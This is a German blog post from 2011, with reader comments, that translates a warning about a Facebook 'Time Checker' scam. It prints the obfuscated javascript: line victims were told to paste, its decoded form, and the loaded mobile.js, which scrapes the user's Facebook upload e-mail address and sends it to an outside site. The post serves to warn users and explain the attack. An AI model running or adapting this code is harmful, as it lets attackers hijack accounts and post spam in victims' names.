Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Üble JavaScript-Schadsoftware für Facebook

Montag, 24. Januar 2011, 16:40 Uhr

Der folgende Text ist eine schnelle Übertragung eines englischsprachigen Textes im Blog „Useful for me“. Die Publikation einer Übersetzung ist dort ausdrücklich gestattet, und weil diese Schadsoftware auch unter deutschen Facebook-Nutzern „umgeht“, habe ich mir die kleine Mühe gemacht. Bitte seid allesamt ein bisschen vorsichtiger mit irgendwelchen eher nutzlosen Angeboten für Facebook, es gibt wirklich schon genug Spam und Betrug auf der Welt. Ein Dank für den Hinweis auf diesen kriminellen Angriff geht an Schoschie.

Schützen sie sich vor Betrug und Identitätsdiebstahl auf Facebook – der „Facebook Time Checker“ ist eine betrügerische Irreführung

Auf diese Weise ist meine persönliche Publishing-Adresse für Facebook in fremde Hände geraten:

(Mit der persönlichen Publishing-Adresse [Meine Frage an die aktiven Facebooker: Heißt das auch auf Deutsch so?] kann ein Facebook-Anwender Bilder und Nachrichten posten, indem er eine E-Mail an diese Adresse sendet. Wenn jemand ihre persönliche Publishing-Adresse kennt, denn kann er in Facebook ihre Identität annehmen und in ihrem Namen sowohl Nachrichten als auch Bilder posten, ohne dass sie damit einverstanden sein oder davon wissen müssen. So etwas kann sehr „gut“ von Menschen mit kranken Absichten verwendet werden, um Facebook mit Spam unbenutzbar zu machen.)

Vor kurzem (am 18. Januar um Mitternacht) habe ich einen Link angeklickt, der mir von einem meiner Freunde auf Facebook gesendet wurde… ich habe letzten Endes das getan, wovon mir dort gesagt wurde, dass ich es tun soll. Ich war ein bisschen müde und deshalb bei dieser Tätigkeit nicht besonders aufmerksam.

Der Link sah so aus¹: „Ich habe in meinem Leben 132 Stunden auf Facebook verbracht. Wow, das ist eine Menge verschwendeter Zeit. Finde heraus, wie viel Zeit du auf Facebook verbracht hast – http (doppelpunkt) (doppelslash) goo (punkt) gl (slash) AYkjm“. Diese gekürzte Adresse war eine Weiterleitung auf http (doppelpunkt) (doppelslash) www (punkt) news17channel (punkt) com (slash) time (slash) next (punkt) php (fragezeichen) id (gleich) SCiGm_d [Meine Anmerkung: Der Betrug ist dort inzwischen nicht mehr verfügbar, aber es ist sicher, dass die gleiche Masche über andere Adressen weiterläuft.]

Die Seite, die ich dort erreichte, nannte sich „Facebook Time Checker“. Sie gab vor, dass sie eine gewisse „Browser-Magie“ anwendet, um mir als Ergebnis die gesamte Zeit zu zeigen, die ich auf Facebook verbracht habe.

Das ist nicht wahr. Nur Facebook kennt solche Details, und sie sind nicht veröffentlicht. Es dient einfach nur als guter Vorwand für einen Dritten, um sich ihrer persönlichen Informationen zu bemächtigen.

Ich wurde dort angewiesen, das folgende JavaScript über die Zwischenablage in meinem Browser [Meine Anmerkung: In die Adresszeile des Browsers] zu bringen, um die Zeit, die ich bis jetzt auf Facebook verbracht habe, zu ermitteln.

Das JavaScript sieht so aus ([Meine Anmerkung: Das ist lauffähige Schadsoftware!] Denken Sie nicht einmal daran, dieses Skript in ihren Browser zu kopieren!)

javascript:var _0xbdfc=[
"\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",
"\x73\x72\x63",
"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77
\x2e\x6e\x65\x77\x73\x31\x37\x63\x68\x61
\x6e\x6e\x65\x6c\x2e\x63\x6f\x6d\x2f\x74
\x69\x6d\x65\x2f\x6d\x6f\x62\x69\x6c\x65
\x2e\x6a\x73",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64",
"\x62\x6F\x64\x79"
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);

[Meine Anmerkung: Wer seine Inhalte derart in hexadezimalem ASCII-Code verbirgt, sollte alle Alarmglocken klingeln lassen. Kein Programmierer würde seinen Code vorsätzlich so unlesbar machen. Wer diese Anmerkung überhaupt nicht versteht, sollte generell davon absehen, irgendwelche Skripten aus obskuren Quellen auf seinen Browser loszulassen. Wer würde im Zeitalter der massenhaften Spam und der organisierten Internet-Kriminalität einem völlig anonymen, fremden Menschen erlauben, irgendwelchen Code auf dem eigenen Rechner auszuführen?]

Ich habe das genau so getan, wie es gefordert wurde, weil ich wegen der Uhrzeit alles in einer eher mechanischen Haltung tat…

Und dann erst, hinterher, kam ich auf die Idee, dass ich möglicherweise etwas Schädliches getan hätte, und deshalb fing ich an, zu überprüfen, was dieses Skript eigentlich macht.

Als erstes habe ich das Skript in eine menschlesbare Form übersetzt. [Meine Anmerkung: Tippfehler aus dem Originalpost entfernt]

javascript:var _0xbdfc=[
"script",
"createElement",
"src",
"http://www.news17channel.com/time/mobile.js",
"appendChild",
"body"
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);

[Meine Anmerkung: Inzwischen ist der Schadcode auf www (punkt) news17channel (punkt) com nicht mehr verfügbar, aber es ist sicher, dass immer noch die gleiche Masche über andere Adressen weiterläuft.]

Offenbar wird hier ein JavaScript ausgeführt, das auf einem Server im Internet hinterlegt ist.

Werfen wir doch einen Blick auf die Datei mobile.js:

//Append jquery library
var newjs = document.createElement('script');
newjs.setAttribute('src', 'http://socialgifts.info/jquery.js');
document.body.appendChild(newjs);
setTimeout(function(){
//Grab post form id and other stuff for posting
if(location.href == "http://www.news17channel.com/time/index.php")
    {
        alert("Wrong Page. You must paste the script into your browser's\n
               address bar on any facebook tab or window.\n\n Then Hit Enter!");
        return;
    }
    var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    //grab mobiles
    $.get("http://m.facebook.com/upload.php“, function(data) {
        var mydata = data;
        var mobiles;
        var count = 0;
        $($(mydata).find(‘a').filter(‘:contains(“m.facebook.com“)‘)).
        each(function(){if(($(this).text() != undefined)){ mobiles += $(this).text() +“;“;}});
        var clean = mobiles.replace(“undefined“,““);
        var cut = clean.slice(0,clean.length – 1);
        var insert = cut.replace(/;/g,“,“);
        //Redirect to php inserter which redirects back to next set of steps.
        top.location.href = 'http://www.news17channel.com/time/check.php?get=1&m=,'+insert;
    });
},2000);
alert(“Time Checker Processing – Please wait 2 seconds and click OK to view results.“);

Wenn wir uns diese Datei anschauen, wird unmittelbar klar, dass dieses Skript die Datei uploads.php für die mobile Benutzung von Facebook lädt und dort den verlinkten Text im Link auf m.facebook.com ermittelt.

Dieser Text enthält ihre persönliche E-Mail-Adresse für den Upload [Meine Anmerkung: von Texten und Bildern zu Facebook].

Zum Abschluss sendet dieses Skript die ermittelte E-Mail-Adresse zu einer externen Website.

Damit haben diese Leute die Kontrolle über ihren Facebook-Account erlangt. Mithilfe dieser E-Mail-Adresse können sie alles auf ihrer Facebook-Seite veröffentlichen, ohne dass sie dazu eine weitere Erlaubnis geben müssten!

Wenn sie, genau wie ich, versehentlich all das getan haben, von dem ich nicht unterstellen möchte, dass sie so etwas tun, denn müssen sie sofort handeln:

Besuchen sie ihre Seite http://m.facebook.com/upload.php und setzen sie dort ihre persönliche Publishing-Adresse zurück. Wenn sie das tun, erzeugt Facebook eine neue Adresse für sie. Das reicht aus, denn die Angreifer haben keine Möglichkeit, ihre neue Publishing-Adresse herauszubekommen.

Ich hoffe wirklich, dass Menschen, die das lesen, nicht Facebook verwünschen! Wenn sie weitere Websites kennen, die für diese Art Angriff verwendet werden, lassen sie es uns bitte wissen (ihre Kommentare sind willkommen). Es folgt eine Liste [Meine Anmerkung: mit Stand vom 24. Januar] mit derartigen Websites:

Nachtrag vom 23. Januar 2011 – Es scheint so, dass auch deutsche Facebook-User ausgetrickst wurden, damit sie dieses JavaScript verwenden und wahrscheinlich viel mehr User in unterschiedlichen Sprachräumen. Wenn jemand die Möglichkeit hat, diesen Post in anderen Sprachen zu übersetzen, damit andere ihn in ihrer Muttersprache lesen können, heißen wir diese Hilfe willkommen. Bitte lassen sie es mich wissen, wenn solche Übersetzungen existieren und stellen sie uns den Link darauf zur Verfügung. Ich gestatte hiermit jedem, den Inhalt dieses Posts zu übersetzen, so lange in der übersetzten Version ein Link auf diese Seite gesetzt wird.

Nachtrag vom 24. Januar 2011 – Auch serbische User wurden mit einer etwas anderen Form dieses Skriptes ausgetrickst. Für dieses andere Skript habe ich einen eigenen Post verfasst. Das Prinzip ist das gleiche. Etwas JavaScript wird in die Adresszeile des Browsers eingefügt, und dies lädt ein wesentlich mächtigeres Skript nach. Ich habe inzwischen im Internet nach weiteren Hinweisen gesucht und fand heraus, dass diese Skripten nicht so neu sind, wie ich es zunächst annahm. Das einzig neue Problem ist es, dass social websites diese Skripten viral machen. Ich meine, dass Facebook irgendein System implementieren sollte, um diese Skripten automatisch zu filtern. Es könnte die Posts seiner User auf bestimmte Muster hin überprüfen und damit auch die Links erkennen, die seine User als Hinterlassenschaft solcher Skripten setzen. So weit ich die Copyright-Richtlinien Facebooks kenne, hat Facebook alle Rechte, mit den Inhalten seiner User zu tun, was immer ihm beliebt, so dass ein derartiges Vorgehen kein Problem darstellen sollte.

¹Englischer Originaltext: Ive spent over 132 hours on facebook in my lifetime! Wow that’s a lot of time wasted! Find out how much time you’ve spent on facebook here – http://goo.gl/AYkjm

19 Kommentare für Üble JavaScript-Schadsoftware für Facebook

  1. tux, sagt:

    Klugscheiß:
    „Slash“ heißt auf Deutsch jedenfalls nicht so. 😉

    Ansonsten: Ist Facebook selbst nicht bereits übelste Schadsoftware?

    • Au weia, wenn ich den slash jetzt auch noch einen Schrägstrich oder für die meisten Menschen komplett unverständlich, aber wunderbar klugscheißerisch einen Solidus nenne, denn ist das Layout durch die langen Wörter ungenießbar. Ich hoffe mal, dass jeder weiß, was ein Slash ist… 😉

      Und ja, das Fratzenbuch ist ein Stück… ähm… durch Verdauungsvorgänge veredelter Nahrung. Leider hält das viele Leute nicht davon ab, es für die beste Erfindung seit dem Rad zu halten.

  2. […] weiß ja nicht, wie viele von euch auf Facebook aktiv sind. Aber die Warnung vor einigen umlaufenden Hacks mit allerlei kleinen Nutzlos-Programmen sollte sich jeder zu Gemüte führen, der seinen Facebook-Auftritt nicht zu einer […]

  3. […] HERE IS HOW MY FACEBOOK PERSONAL PUBLISHING ADDRESS GOT STOLEN: Update 2011.01.25 – For a complete German language translation you can visit Elias’s blog. […]

  4. Dan sagt:

    Thanks for the translation!

  5. Herbert sagt:

    … facebook ist kein Übel. Aber es ist wie bei E-Mails: wer unvorsichtig jeden Quatsch öffnet, alles ausprobiert ohne sich Gedanken zu machen und auf alle verfügbaren Buttons klickt, wird sich irgend wann die Zecken einfangen. Das ist so. Bleibt zu hoffen, daß auch DIE Leute klüger werden…

  6. Ritchie sagt:

    Neue Masche? Die ersten JS-Exploits für FB hab ich vor ungefähr 1 1/2 Jahren geschickt bekommen….

  7. […] facebook verbracht java script — Das ist eine üble Schadsoftware. Denk gar nicht erst daran, so etwas auf deinen Account […]

  8. facebook userin sagt:

    hi,
    eine freundin von mir hat eine ähnliche sache angeklickt, die auch die auf facebook verbrachte zeit ermittelt. der kurzlink (den ich nicht angeklickt habe), lautet:
    h t t p : / / g o o . g l / 1 V i f U
    (ohne leerzeichen natürlich). vielleicht könnt ih das checken und als hilfe für andere user uin den beitrag aufnehmen.

    keep up the good work 🙂

    • Hihi, selbst mit den Leerzeichen hat da gleich der Spamfilter angeschlagen. Sorry… 😉

      Die Seiten, auf denen so ein Schadskript verteilt wird, wechseln ständig. Da kann niemand nachkommen. Das einzige, was hilft, ist ein kurzes Nachdenken, bevor man anderer Leute Software auf dem eigenen Rechner ausführt – und genau das tut man, wenn man einen Fetzen JavaScript in die Adresszeile seines Browsers einträgt. Ich würde jedenfalls nicht einem anonym bleibenden Zeitgenossen erlauben, auf meinem Rechner ein Programm auszuführen, nur weil er mir eine obskure Funktion verspricht.

  9. Hilfesuchend sagt:

    Hey Leute,

    ich habe eine Gesellschaftsseite für eine Vereinigung, da postet sich das auch immer, ich habe es schon mehrfach versucht, mit der Änderung des Links, aber es postet weiterhin!
    Kann mir da jemand helfen?

    Danke!

  10. […] Üble JavaScript-Schadsoftware für Facebook « Unser täglich Spam window.fbAsyncInit = function() { FB.init({appId: "136364086389831", status: true, cookie: true, […]

  11. Christoph sagt:

    Hallo Leute,

    vielen Dank fuer den Post, sehr hilfreich!
    Leider habe auch ich nicht richtig nachgedacht und es ausprobiert, ich habe auch versucht die Herausgeberadresse zurueckzusetzen, allerdings kommt dort eine unserioese E-Mail Adresse nach der anderen. Also ich dachte, dass, wenn ich sie 1x zuruecksetze, die normale E-Mail Adresse erscheint aber es kommen zum Beispiel folgende.

    iguazu996orlon@m.facebook.com

    Was kann ich tun? Kontakt mit FB aufnehmen und die Sache aendern lassen?

    Vielen Dank und Gruss im voraus.

    • Ich bin nicht bei Facebook und weiß daher auch nicht, was man am besten beim Missbrauch des eigenen Accounts tun kann. Ich habe einfach nur diesen Artikel übersetzt, als ich mitbekam, dass diese Malware auch im deutschen Sprachraum umgeht – dass also eine deutliche Warnung ausgesprochen werden muss.

      Vermutlich ist das Problem bei Facebook bereits bekannt, und vermutlich können die Verantwortlichen auf Seiten Facebook sehr zuverlässige Hilfestellung geben.

    • void() sagt:

      Das ist kein unseriöse E-Mail Adresse. Die von dir genannte Adresse (du solltest sie nochmals ändern) dient als Zugang zu Facebook. Wenn du ein Bild oder eine E-Mail an diese Adresse schickst wird dies sofort von Facebook veröffentlicht. Damit du z.B. von deinem Mobiltelefon deinen Status updaten kannst.

      Die Adresse ist deswegen kryptisch damit man sie nicht erraten kann und kein fremder deinen Account vollspammen kann.

  12. malte sagt:

    servus!
    was passiert denn genau, wenn ich meine e-mail adresse zurücksetze?
    wird dann von facebook für mich irgendwo ein e-mail account erstellt?
    brauch ich die neue e-mail adress um mich einzuloggen?
    oder betrifft die passwortänderung nur facebookbenutzung mit einem handy?

  13. Janik sagt:

    Hi,

    ich habe jetzt mal eine Facebook-Seite gegen den Spam erstellt, weil mich das so aufregt…
    Ich würde mich sehr freuen wenn ihr auf Gefällt mir klicken / Sie weiterempfehlen / Teilen könntet, damit alle von den Facebook-Würmern erfahren!

    Link: http://www.facebook.com/pages/Anti-FB-Spam/173936496031500

    Vielen Dank für diesen umfangreichen Beitrag!

    Janik

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert